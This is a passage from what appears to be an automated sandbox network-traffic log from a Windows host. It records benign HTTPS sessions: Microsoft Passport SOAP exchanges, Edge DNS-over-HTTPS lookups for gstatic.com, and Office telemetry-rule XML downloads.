2024-11-10 03:55:20 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-10 03:55:20 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sun, 10 Nov 2024 03:54:20 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_BAY x-ms-request-id: c4d4c716-ebdf-4ea5-837e-3fa9c8d353af PPServer: PPV: 30 H: PH1PEPF0001B72B V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sun, 10 Nov 2024 03:55:20 GMT Connection: close Content-Length: 1276
2024-11-10 03:55:20 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49781	162.159.61.3	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-10 03:55:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-10 03:55:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 10 Nov 2024 03:55:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e031b3ce92ce997-DFW alt-svc: h3=":443"; ma=86400
2024-11-10 03:55:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 38 00 04 8e fa 71 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom8q^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49780	162.159.61.3	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-10 03:55:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-10 03:55:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 10 Nov 2024 03:55:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e031b3cfce0c871-DFW alt-svc: h3=":443"; ma=86400
2024-11-10 03:55:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 09 00 04 8e fa 72 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomr^)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49782	162.159.61.3	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-10 03:55:20 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-10 03:55:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sun, 10 Nov 2024 03:55:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e031b3d0d83e732-DFW alt-svc: h3=":443"; ma=86400
2024-11-10 03:55:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d5 00 04 8e fa 72 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomr^)

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:20 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:20 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: ee786005-101e-0065-140e-2d4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035520Z-16547b76f7fwvr5dhC1DFW2c940000000by000000000hvcs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:20 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:20 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 5ae26df0-401e-0083-7985-30075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035520Z-17df447cdb5bz95mhC1DFWnk7w00000008b0000000004gkp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:20 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:20 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 0cc43b16-c01e-00a2-215a-322327000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035520Z-17df447cdb528ltlhC1DFWnt1c000000089g000000002sr9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:20 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:20 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:20 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 9ed703a9-f01e-0020-1358-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035520Z-17df447cdb5bz95mhC1DFWnk7w000000089g000000008aep x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:20 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:20 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:20 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:20 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035520Z-16547b76f7fxdzxghC1DFWmf7n0000000c2g00000000q82w x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:20 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:21 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:21 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: a814885b-f01e-0003-49e5-2e4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035521Z-17df447cdb54ntx4hC1DFW2k4000000008m0000000008ctb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:21 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:21 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:21 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 4fda4cb6-f01e-003f-2793-31d19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035521Z-17df447cdb5km9skhC1DFWy2rc00000008q000000000d2at x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:21 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:21 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
